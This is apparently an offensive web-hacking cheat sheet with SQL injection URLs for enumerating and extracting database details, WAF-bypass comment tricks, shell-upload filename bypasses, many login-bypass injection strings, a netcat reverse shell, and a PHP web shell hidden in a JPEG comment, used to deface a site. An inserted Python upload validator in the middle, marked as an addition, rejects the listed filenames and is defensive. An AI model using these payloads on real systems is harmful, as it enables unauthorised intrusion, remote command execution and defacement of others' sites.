Basic SQL Injection
Check for the vulnerability.
http://www.target.com/index.php?id=25'
Check how many columns (ORDER BY method).
http://www.target.com/index.php?id=25 order by 10-- -> error
http://www.target.com/index.php?id=25 order by 9-- -> not error
Check for the vulnerable column (UNION SELECT method).
http://www.target.com/index.php?id=25+Union+Select+1,2,3,4,5,6,7,8,9--
Print database, version and user
http://www.target.com/index.php?id=25+Union+Select+1,concat(database(),user(),version()),3,4,5,6,7,8,9--
Bypass 403 Forbidden SQLi
/*!50000*/
/*!50000UNION*/+/*!50000SELECT*/
Bypass Mod Security SQLi
/*!00000*/
/*!00000UNION*/+/*!00000SELECT*/
Shell Upload Bypass Extensions
shell.phtml
shell.php jpg
shell.php.txt
shell.php;_.fla
shell.pjpeg
shell.cin
shell.shtml
shell.pjpg.php.jpg
shell.php;.jpg
shell.php.xxxjpg
shell.php.test
shell.php3
shell.php5
shell.jpg.PhP
shell.php.jpg
shell.php.fla
shell.php%00.jpg
shell.php.;jpg
shell.PhP.txt
shell.php.png
shell.php.gif
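A server-side upload check that rejects every filename in the list above, added here as an example and not part of the original page. The names check_upload, accepted, ALLOWED, NAME_RE and PAGE_NAMES are hypothetical, and the sample content is constructed.

```python
import re
import secrets

# Extension allow-list mapped to the magic bytes the content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Exactly one dot; the stem may hold only letters, digits, "_" and "-".
# Rejects double extensions, ";", spaces and "%00" before any lookup happens.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

# The filenames listed above on this page, used as a rejection corpus.
PAGE_NAMES = [
    "shell.phtml", "shell.php jpg", "shell.php.txt", "shell.php;_.fla",
    "shell.pjpeg", "shell.cin", "shell.shtml", "shell.pjpg.php.jpg",
    "shell.php;.jpg", "shell.php.xxxjpg", "shell.php.test", "shell.php3",
    "shell.php5", "shell.jpg.PhP", "shell.php.jpg", "shell.php.fla",
    "shell.php%00.jpg", "shell.php.;jpg", "shell.PhP.txt", "shell.php.png",
    "shell.php.gif",
]

# Constructed sample content: a minimal JPEG header, not a real image.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16


def check_upload(client_name, content):
    """Return a server-generated storage name, or None if rejected."""
    m = NAME_RE.fullmatch(client_name)
    if m is None:
        return None
    ext = m.group(1).lower()
    magics = ALLOWED.get(ext)
    if magics is None or not content.startswith(magics):
        return None
    # The client-supplied stem is discarded; only the vetted extension survives.
    return secrets.token_hex(16) + "." + ext


def accepted(names, content=SAMPLE_JPEG):
    """Names from `names` that pass the check for the given content."""
    return [n for n in names if check_upload(n, content) is not None]


if __name__ == "__main__":
    print("accepted from page list:", accepted(PAGE_NAMES))
    print("photo.JPG ->", check_upload("photo.JPG", SAMPLE_JPEG))
```

A name and magic-byte check does not detect code carried in image metadata such as a JPEG comment, so the stored files must also live in a location where the web server never executes scripts.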
Bypass Login Authentication
admin'--
= 'or' 1=1
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") Or ("a"="a
' Or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" Or "a"="a
') or ('a'='a
How to use reverse shell
Open Termux:
pkg install netcat
nc -lnvp 4444
nc -e /bin/sh 127.0.0.1 4444
How to make jpg shell using Jhead
Open Termux
Command:
pkg install jhead
jhead -purejpg shell.jpg
jhead -ce shell.jpg
if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}
'__halt_compiler();
jhead shell.jpg
Upload File:
/shell.php?cmd=ls
/shell.php?cmd=echo 'Baba Fucked Your Site' > baba.txt
How to run localhost using termux
Open termux
Command:
pkg install php
php -S localhost:8080